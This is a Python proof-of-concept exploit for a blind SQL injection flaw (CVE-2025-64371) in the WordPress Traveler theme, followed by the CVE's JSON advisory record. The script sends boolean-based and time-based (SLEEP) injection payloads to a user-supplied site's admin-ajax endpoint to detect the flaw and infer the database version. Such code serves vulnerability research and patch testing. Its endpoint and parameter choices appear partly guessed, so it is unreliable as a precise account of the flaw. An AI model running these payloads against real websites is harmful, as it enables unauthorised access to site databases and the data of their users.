CVE-2025-64371

import requests import sys # CVE-2025-64371 Blind SQL Injection PoC # Target: WordPress site with Traveler theme < 3.2.6 def check_vulnerability(url): """Check if target is vulnerable to CVE-2025-64371""" # Common Traveler endpoints that may be vulnerable test_endpoints = [ '/wp-admin/admin-ajax.php', '/?ajaxify=1' ] # Blind SQL injection payload for boolean-based detection true_payload = "1' AND 1=1 -- -" false_payload = "1' AND 1=2 -- -" headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } for endpoint in test_endpoints: target_url = url.rstrip('/') + endpoint try: # Test with true condition resp_true = requests.get(target_url, params={'action': 'st_search', 'search': true_payload}, headers=headers, timeout=10) # Test with false condition resp_false = requests.get(target_url, params={'action': 'st_search', 'search': false_payload}, headers=headers, timeout=10) # If responses differ, vulnerability may exist if resp_true.status_code != resp_false.status_code or len(resp_true.text) != len(resp_false.text): return True, endpoint except Exception as e: continue return False, None def extract_data(url, endpoint): """Extract database information using blind SQL injection""" # Example: Extract database version db_version_payload = "1' AND (SELECT CASE WHEN (SUBSTRING(@@version,1,1)='5') THEN SLEEP(3) ELSE 1 END) -- -" headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'} target_url = url.rstrip('/') + endpoint try: response = requests.get(target_url, params={'action': 'st_search', 'search': db_version_payload}, headers=headers, timeout=15) # If response takes > 3 seconds, MySQL 5.x is confirmed return response.elapsed.total_seconds() > 3 except: return False if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2025-64371.py <target_url>') sys.exit(1) target = sys.argv[1] print(f'[*] Checking target: {target}') is_vuln, endpoint = check_vulnerability(target) if is_vuln: print(f'[+] Target appears vulnerable! Endpoint: {endpoint}') print('[*] Manual verification recommended') else: print('[-] Target does not appear vulnerable or is not using Traveler theme')

{"cve": {"id": "CVE-2025-64371", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:14.007", "lastModified": "2026-04-27T16:16:41.733", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in shinetheme Traveler traveler allows Blind SQL Injection.This issue affects Traveler: from n/a through < 3.2.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/traveler/vulnerability/wordpress-traveler-theme-3-2-6-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}